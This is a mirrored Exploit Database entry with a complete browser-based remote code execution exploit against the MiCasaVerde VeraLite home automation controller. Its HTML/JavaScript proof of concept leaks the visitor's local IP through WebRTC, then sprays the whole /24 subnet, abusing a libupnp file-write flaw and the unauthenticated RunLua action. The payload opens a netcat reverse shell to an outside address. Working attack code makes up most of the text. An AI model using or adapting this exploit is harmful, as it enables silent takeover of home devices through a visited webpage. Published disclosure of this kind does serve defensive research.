MiCasaVerde VeraLite – Remote Code Execution

• Exploit Database
• 12 阅读

• 作者： Jacob Baines
  日期： 2016-10-20
• 类别：

  • remote
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/40589/

• # Exploit Title: MiCasa VeraLite Remote Code Execution
  # Date: 10-20-2016
  # Software Link: http://getvera.com/controllers/veralite/
  # Exploit Author: Jacob Baines
  # Contact: https://twitter.com/Junior_Baines
  # CVE: CVE-2013-4863 & CVE-2016-6255
  # Platform: Hardware
  
  1. Description
  
  A remote attacker can execute code on the MiCasa VeraLite if someone on the same LAN as the VeraLite visits a crafted webpage.
  
  2. Proof of Concept
  
  <!--
  @about
  This file, when loaded in a browser, will attempt to get a reverse shell
  on a VeraLite device on the client's network. This is achieved with the
  following steps:
  
  1. Acquire the client's internal IP address using webrtc. We then assume the
   client is operating on a \24 network.
  2. POST :49451/z3n.html to every address on the subnet. This leverages two
   things we know to be true about VeraLite:
   - there should be a UPnP HTTP server on 49451
   - VeraLite uses a libupnp vulnerable to CVE-2016-6255.
  3. Attempt to load :49451/z3n.html in an iframe. This will exist if step 2
   successfully created the file via CVE-2016-6255
  4. z3n.html will allow us to bypass same origin policy and it will make a
   POST request that executes RunLau. This also leverages information we
   know to be true about Veralite:
   - the control URL for HomeAutomationGateway is /upnp/control/hag
   - no auth required
  5. Our RunLua code executes a reverse shell to 192.168.217:1270.
  
  @note
  This code doesn't run fast in Firefox. This appears to largely be a performance
  issue associated with attaching a lot of iframes to a page. Give the shell
  popping a couple of minutes. In Chrome, it runs pretty fast but might
  exhaust socket usage.
  
  @citations
  - WebRTC IP leak: https://github.com/diafygi/webrtc-ips
  - Orignal RunLua Disclosure: https://media.blackhat.com/us-13/US-13-Crowley-Home-Invasion-2-0-WP.pdf
  - CVE-2016-6255: http://seclists.org/oss-sec/2016/q3/102
  -->
  <!DOCTYPE html>
  <html>
  <head>
  <meta charset="UTF-8">
  <script>
  /**
   * POSTS a page to ip:49451/z3n.html. If the target is a vulnerable
   * libupnp then the page will be written. Once the request has
   * completed, we attempt to load it in an iframe in order to bypass
   * same origin policy. If the page is loaded into the iframe then
   * it will make a soap action request with the action RunLua. The 
   * Lua code will execute a reverse shell.
   * @param ip the ip address to request to
   * @param frame_id the id of the iframe to create
   */
  function create_page(ip, frame_id)
  {
  payload = "<!DOCTYPE html>\n" +
  "<html>\n" +
  "<head>\n" +
  "<title>Try To See It Once My Way</title>\n" +
  "<script>\n" +
  "function exec_lua() {\n" +
  "soap_request = \"<s:Envelope s:encodingStyle=\\\"http://schemas.xmlsoap.org/soap/encoding/\\\" xmlns:s=\\\"http://schemas.xmlsoap.org/soap/envelope/\\\">\";\n" +
  "soap_request += \"<s:Body>\";\n" +
  "soap_request += \"<u:RunLua xmlns:u=\\\"urn:schemas-micasaverde-org:service:HomeAutomationGateway:1\\\">\";\n" +
  "soap_request += \"<Code>os.execute("/bin/sh -c &apos;(mkfifo /tmp/a; cat /tmp/a | /bin/sh -i 2>&1 | nc 192.168.1.217 1270 > /tmp/a)&&apos;")</Code>\";\n" +
  "soap_request += \"</u:RunLua>\";\n" +
  "soap_request += \"</s:Body>\";\n" +
  "soap_request += \"</s:Envelope>\";\n" +
  
  "xhttp = new XMLHttpRequest();\n" +
  "xhttp.open(\"POST\", \"upnp/control/hag\", true);\n" +
  "xhttp.setRequestHeader(\"MIME-Version\", \"1.0\");\n" +
  "xhttp.setRequestHeader(\"Content-type\", \"text/xml;charset=\\\"utf-8\\\"\");\n" +
  "xhttp.setRequestHeader(\"Soapaction\", \"\\\"urn:schemas-micasaverde-org:service:HomeAutomationGateway:1#RunLua\\\"\");\n" +
  "xhttp.send(soap_request);\n" +
  "}\n" +
  "</scr\ipt>\n" +
  "</head>\n" +
  "<body onload=\"exec_lua()\">\n" +
  "Zen?\n" +
  "</body>\n" +
  "</html>";
  
  var xhttp = new XMLHttpRequest();
  xhttp.open("POST", "http://" + ip+ ":49451/z3n.html", true);
  xhttp.timeout = 1000;
  xhttp.onreadystatechange = function()
  {
  if (xhttp.readyState == XMLHttpRequest.DONE)
  {
  new_iframe = document.createElement('iframe');
  new_iframe.setAttribute("src", "http://" + ip + ":49451/z3n.html");
  new_iframe.setAttribute("id", frame_id);
  new_iframe.setAttribute("style", "width:0; height:0; border:0; border:none");
  document.body.appendChild(new_iframe);
  }
  };
  xhttp.send(payload);
  }
  
  /**
   * This function abuses the webrtc internal IP leak. This function
   * will find the the upper three bytes of network address and simply
   * assume that the client is on a \24 network.
   *
   * Once we have an ip range, we will attempt to create a page on a
   * vulnerable libupnp server via create_page().
   */
  function spray_and_pray()
  {
  RTCPeerConnection = window.RTCPeerConnection ||
  window.mozRTCPeerConnection ||
  window.webkitRTCPeerConnection;
  
  peerConn = new RTCPeerConnection({iceServers:[]});
  noop = function() { };
  
  peerConn.createDataChannel("");
  peerConn.createOffer(peerConn.setLocalDescription.bind(peerConn), noop);
  peerConn.onicecandidate = function(ice)
  {
  if (!ice || !ice.candidate || !ice.candidate.candidate)
  {
  return;
  }
  
  clientNetwork = /([0-9]{1,3}(\.[0-9]{1,3}){2})/.exec(ice.candidate.candidate)[1];
  peerConn.onicecandidate = noop;
  
  if (clientNetwork && clientNetwork.length > 0)
  {
  for (i = 0; i < 255; i++)
  {
  create_page(clientNetwork + '.' + i, "page"+i);
  }
  }
  };
  }
  </script>
  </head>
  <body onload="spray_and_pray()">
  Everything zen.
  </body>
  </html>
  
  3. Solution:
  
  No solution exists